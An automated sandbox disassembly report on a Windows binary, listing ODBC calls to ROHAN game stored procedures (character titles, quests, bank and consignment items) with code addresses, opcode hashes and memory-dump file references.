                                                                                      • Opcode Fuzzy Hash: ffe34146f7950a03eeb0c7135f399785632ee469d4a43202d5951a3ae3b746db
                                                                                      • Instruction Fuzzy Hash: AA312274A40214ABEB24CB45EC52FD97374EB84B54F2082CDF6182FAC4D5F16E808F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelCharTitle] (?, ?, ?)},000000FD), ref: 0043A409
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0043A448
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0043A47D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043A4B5
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043A4ED
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelCharTitle] (?, ?, ?)}, xrefs: 0043A400
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelCharTitle] (?, ?, ?)}
                                                                                      • API String ID: 0-940426881
                                                                                      • Opcode ID: 17fff7511f244762a4a0b8447a1db00790a900e7f20c7b109d5ea70309e5a545
                                                                                      • Instruction ID: 4d7f4c3a82a7968208e7711714c30cd0e106f295e3a6c477626b0c0bd1b3da84
                                                                                      • Opcode Fuzzy Hash: 17fff7511f244762a4a0b8447a1db00790a900e7f20c7b109d5ea70309e5a545
                                                                                      • Instruction Fuzzy Hash: 35310EB1A40254ABEB24CB44CC52FA97375FB84B18F208699F71D7F2C5D6F26D808B58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_CompleteCharSubQuest] (?, ?, ?)},000000FD), ref: 0042F454
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042F493
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042F4C8
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F500
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042F538
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_CompleteCharSubQuest] (?, ?, ?)}, xrefs: 0042F44B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_CompleteCharSubQuest] (?, ?, ?)}
                                                                                      • API String ID: 0-2289681479
                                                                                      • Opcode ID: d2f503a9e2002482a13b27a3aeee487422a36a569b50a00c61b8bd5ff8281338
                                                                                      • Instruction ID: 415492781577280b33224eea27a3119e3bb4c7e32bbdf6f7915603cd1167567e
                                                                                      • Opcode Fuzzy Hash: d2f503a9e2002482a13b27a3aeee487422a36a569b50a00c61b8bd5ff8281338
                                                                                      • Instruction Fuzzy Hash: 3731F0B0A40314ABEB24CF54CD52FA97336EBD4724F208289F6196B2C5D9736D50CB58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN2_SetAllianceGuildNotice](?, ?, ?)},000000FD), ref: 0042D85D
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042D89C
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042D8D1
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042D909
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FE,000000FD,00000064,00000000,?,00000000,?,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042D949
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN2_SetAllianceGuildNotice](?, ?, ?)}, xrefs: 0042D854
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN2_SetAllianceGuildNotice](?, ?, ?)}
                                                                                      • API String ID: 0-100653030
                                                                                      • Opcode ID: ab9d7c63f6f661d6590fa332f8077d8dc584aa5a943dd2e2c3cb9c2b57dee06a
                                                                                      • Instruction ID: 5fc936b88362398da5969f18680b2621f28eb6317e3a935492c55f0cefddb6db
                                                                                      • Opcode Fuzzy Hash: ab9d7c63f6f661d6590fa332f8077d8dc584aa5a943dd2e2c3cb9c2b57dee06a
                                                                                      • Instruction Fuzzy Hash: 0B3143B06507187BEB24DF14DC52FAB7334FB84755F104288F618AA2C5E6B16E40CF58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_DelCharQuest5] (?, ?, ?)},000000FD), ref: 0042EB6A
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042EBA9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042EBDE
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042EC16
                                                                                      • #72.ODBC32(?,00000000,00000001,000000FA,000000FA,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0042EC4E
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_DelCharQuest5] (?, ?, ?)}, xrefs: 0042EB61
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: {? = CALL [ROHAN_DelCharQuest5] (?, ?, ?)}
                                                                                      • API String ID: 0-4026403390
                                                                                      • Opcode ID: 01e33066effab847a6c5aecfb398bf2d3e29428398710f2a02db5bd790bcae51
                                                                                      • Instruction ID: 9f0dbcbc06eafebe0defbb9a09302fc5ef01c36a39bc652e1f546db8fcd12939
                                                                                      • Opcode Fuzzy Hash: 01e33066effab847a6c5aecfb398bf2d3e29428398710f2a02db5bd790bcae51
                                                                                      • Instruction Fuzzy Hash: 693124B06416146FEB24CF54CC51F997336EBC8724F208289F6152F2C4D576AD908F58
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN3_SendBankToRTM](?,?,?) } ,000000FD), ref: 00424521
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 00424551
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042457D
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 004245A9
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 004245D5
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN3_SendBankToRTM](?,?,?) } , xrefs: 00424518
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN3_SendBankToRTM](?,?,?) }
                                                                                      • API String ID: 0-3059458706
                                                                                      • Opcode ID: cd761da88704944da8de8d0129560332a6d47d4290ee74ed0adce9f64a03fc48
                                                                                      • Instruction ID: 291e774eb92048823725ef67b264ea5170b3060be4f30488d5b684ac6b07a40b
                                                                                      • Opcode Fuzzy Hash: cd761da88704944da8de8d0129560332a6d47d4290ee74ed0adce9f64a03fc48
                                                                                      • Instruction Fuzzy Hash: E031CFB1A44208BBEB14DF94CC52FAE7775EF84B18F248209F7206F2C5D6B5B8528758
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{ ? = CALL [ROHAN3_MoveRTMOutToBank](?,?,?) } ,000000FD), ref: 004245FF
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 0042462F
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 0042465B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 00424687
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000E7,000000FB,00000000), ref: 004246B3
                                                                                      Strings
                                                                                      • { ? = CALL [ROHAN3_MoveRTMOutToBank](?,?,?) } , xrefs: 004245F6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: { ? = CALL [ROHAN3_MoveRTMOutToBank](?,?,?) }
                                                                                      • API String ID: 0-3594972019
                                                                                      • Opcode ID: 414954adfa4d075cfdb844137d559032e17f6fd4eed5f7f1dfb16e947d948328
                                                                                      • Instruction ID: 86b885cadc76fa0ff5ac842cf0fe60ff3ee560adece04feaed86eb5ef83d74a6
                                                                                      • Opcode Fuzzy Hash: 414954adfa4d075cfdb844137d559032e17f6fd4eed5f7f1dfb16e947d948328
                                                                                      • Instruction Fuzzy Hash: 2531F0B1A44248BBEB14CFD4CC52FAE7775EB84B18F208209F7217F2C9D6B5A8518758
                                                                                      APIs
                                                                                      • #19.ODBC32(?,{? = CALL [ROHAN_ConsignGetItem] (?,?,?)},000000FD), ref: 0043069C
                                                                                      • #72.ODBC32(?,00000000,00000004,000000F0,00000004,00000000,00000000,?,00000000,00000000), ref: 004306DB
                                                                                      • #72.ODBC32(?,00000000,00000001,000000F0,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000004,000000F0,00000004,00000000), ref: 00430713
                                                                                      • #72.ODBC32(?,00000000,00000001,000000EE,00000004,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000F0,00000004,00000000), ref: 0043074B
                                                                                      • #72.ODBC32(?,00000000,00000001,000000E7,000000FB,00000000,00000000,?,00000000,00000000,?,00000000,00000001,000000EE,00000004,00000000), ref: 00430783
                                                                                      Strings
                                                                                      • {? = CALL [ROHAN_ConsignGetItem] (?,?,?)}, xrefs: 00430693
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
